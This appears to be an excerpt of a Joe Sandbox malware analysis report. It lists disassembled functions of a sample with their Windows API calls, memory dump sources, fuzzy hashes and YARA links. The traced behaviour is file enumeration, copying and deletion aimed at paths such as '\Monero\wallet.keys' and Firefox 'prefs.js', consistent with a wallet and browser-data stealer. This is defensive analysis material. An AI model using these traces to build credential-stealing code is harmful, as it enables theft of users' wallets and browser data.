                  • Instruction Fuzzy Hash: 20427172910104ABCB54FBA0DD96EED737EAF94300F40455CF94AA6181EE30AB49DFE6
                  Function 00634910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0063492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00634943
                  • StrCmpCA.SHLWAPI(?,00640FDC), ref: 00634971
                  • StrCmpCA.SHLWAPI(?,00640FE0), ref: 00634987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00634B7D
                  • FindClose.KERNEL32(000000FF), ref: 00634B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: c5d39b59a168ccb43351922529a5f5a8158fd1776ed9b0fc475888f298e8984c
                  • Instruction ID: 65393caad262d03e6350f6359361f80629647526213f91e931c1c686d3705f7a
                  • Opcode Fuzzy Hash: c5d39b59a168ccb43351922529a5f5a8158fd1776ed9b0fc475888f298e8984c
                  • Instruction Fuzzy Hash: 5B6153B1900218ABCB64EBA0DC45FEA737DBB48700F058598F64AA6141EF75EB85CFD1
                  Function 00634570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00634580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00634587
                  • wsprintfA.USER32 ref: 006345A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 006345BD
                  • StrCmpCA.SHLWAPI(?,00640FC4), ref: 006345EB
                  • StrCmpCA.SHLWAPI(?,00640FC8), ref: 00634601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0063468B
                  • FindClose.KERNEL32(000000FF), ref: 006346A0
                  • lstrcat.KERNEL32(?,0131F7E0), ref: 006346C5
                  • lstrcat.KERNEL32(?,0131EDF0), ref: 006346D8
                  • lstrlen.KERNEL32(?), ref: 006346E5
                  • lstrlen.KERNEL32(?), ref: 006346F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 2e0ccec3cbf777df9915d79a7ebcf1e46f972972112572d7ec304e72a29cef01
                  • Instruction ID: 001a34fbe7d410cc36a838f5f50c5435f48fc93d7bedbe1a63a819bd47a995fa
                  • Opcode Fuzzy Hash: 2e0ccec3cbf777df9915d79a7ebcf1e46f972972112572d7ec304e72a29cef01
                  • Instruction Fuzzy Hash: 5F5163B1900218ABC764EB70DC89FED737DBB58300F404598F649A6190EFB4EB848F92
                  Function 00633EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00633EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00633EDA
                  • StrCmpCA.SHLWAPI(?,00640FAC), ref: 00633F08
                  • StrCmpCA.SHLWAPI(?,00640FB0), ref: 00633F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0063406C
                  • FindClose.KERNEL32(000000FF), ref: 00634081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 56325dd7de945cc2d11ea88cc0c5626fb6f5da0330371c09e677908b508c16d1
                  • Instruction ID: ace2872b11af91f46336f90466f4208271e7e746df6f16b0ea4dc68171bde983
                  • Opcode Fuzzy Hash: 56325dd7de945cc2d11ea88cc0c5626fb6f5da0330371c09e677908b508c16d1
                  • Instruction Fuzzy Hash: D05165B2900218ABCB24EBB4DC85EEA737DBB44300F40459CF759A7180DB75EB898F95
                  Function 0062ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 0062ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0062ED55
                  • StrCmpCA.SHLWAPI(?,00641538), ref: 0062EDAB
                  • StrCmpCA.SHLWAPI(?,0064153C), ref: 0062EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0062F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: e3cd827217099729c677e13dd3b1cc9afa23df34d1726b51fcf7665de2eda961
                  • Instruction ID: 9529860b0447c93446c8f5f5f3829aa770bb030e5ea9c643eba1673d5d6019d9
                  • Opcode Fuzzy Hash: e3cd827217099729c677e13dd3b1cc9afa23df34d1726b51fcf7665de2eda961
                  • Instruction Fuzzy Hash: EAE1F671911118AADB94FBA0DC51EEE733AAF54300F4141EDB54A62092EF306F8ADFD5
                  Function 0062F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006415B8,00640D96), ref: 0062F71E
                  • StrCmpCA.SHLWAPI(?,006415BC), ref: 0062F76F
                  • StrCmpCA.SHLWAPI(?,006415C0), ref: 0062F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0062FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 7a4a3eed490f2d50947fffdddc7c159268b7d92420b5abf43c1866803d2406db
                  • Instruction ID: 54f08af93e42408979dba16534f2cd6553775bda6b369e00bc99bd5d5ef403ff
                  • Opcode Fuzzy Hash: 7a4a3eed490f2d50947fffdddc7c159268b7d92420b5abf43c1866803d2406db
                  • Instruction Fuzzy Hash: 12B13271900118ABDB64FFA0DC95AEE737AAF54300F4085ACE44A96191EF30AB49DFD6
                  Function 006216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0064510C,?,?,?,006451B4,?,?,00000000,?,00000000), ref: 00621923
                  • StrCmpCA.SHLWAPI(?,0064525C), ref: 00621973
                  • StrCmpCA.SHLWAPI(?,00645304), ref: 00621989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00621D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00621DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00621E20
                  • FindClose.KERNEL32(000000FF), ref: 00621E32
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: c4821559157b96e04eeaad937492cf0f88c642d3de03541eb2cd49462e800a7b
                  • Instruction ID: 1da9cd66aeacc17a6896187ab2f48d6b910a619a7b455e1237fc284f05194ce3
                  • Opcode Fuzzy Hash: c4821559157b96e04eeaad937492cf0f88c642d3de03541eb2cd49462e800a7b
                  • Instruction Fuzzy Hash: A6128271910118ABCB59FBA0DC96EEE733AAF14300F4141ADB14A66091EF306F89DFE5
                  Function 0062DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00640C2E), ref: 0062DE5E
                  • StrCmpCA.SHLWAPI(?,006414C8), ref: 0062DEAE
                  • StrCmpCA.SHLWAPI(?,006414CC), ref: 0062DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0062E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: b08936a95af291475471de73ad5d3109fb78c66c0c3a20dc0910b1ff14d9db40
                  • Instruction ID: 5992a2865f05c161468216c63331b50672cc5603817f8a99efce80872e833441
                  • Opcode Fuzzy Hash: b08936a95af291475471de73ad5d3109fb78c66c0c3a20dc0910b1ff14d9db40
                  • Instruction Fuzzy Hash: 4DF1C271814118AADB59FBA0DC95EEE737ABF14300F4141EDB44A62091EF306F8ADF96
                  Function 0062DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006414B0,00640C2A), ref: 0062DAEB
                  • StrCmpCA.SHLWAPI(?,006414B4), ref: 0062DB33
                  • StrCmpCA.SHLWAPI(?,006414B8), ref: 0062DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0062DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0062DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 962276701e50f57b730063428b8855e808a4930eaf05a1393f2b09ec432303ff
                  • Instruction ID: bca1b952af6062a1a1311388b30530dfd9d49aa3fecf2821c6faf83c23be56a9
                  • Opcode Fuzzy Hash: 962276701e50f57b730063428b8855e808a4930eaf05a1393f2b09ec432303ff
                  • Instruction Fuzzy Hash: F5917672900114ABCB54FBB0EC969ED737EAF94300F41866CF946A6181EE349B09DFD6
                  Function 009F3B0D Relevance: 12.9, Strings: 9, Instructions: 1661COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 1=,$BJ3w$PFwf$^9oy$fo~$(N$0x$5=$m~N
                  • API String ID: 0-2317833948
                  • Opcode ID: 08839abe629a68616e5bb91af8a10c051411ec06cfb4393da064bb4f615f4827
                  • Instruction ID: 3ce755b849f5d8ee225837e36efd24152dee54204697c19da9d0426a68237ba5
                  • Opcode Fuzzy Hash: 08839abe629a68616e5bb91af8a10c051411ec06cfb4393da064bb4f615f4827
                  • Instruction Fuzzy Hash: BDB25BF360C3049FE704AE2DEC8567BBBD9EB94720F1A4A3DE6C5C7344E93598018696
                  Function 009E2D9B Relevance: 11.6, Strings: 8, Instructions: 1629COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
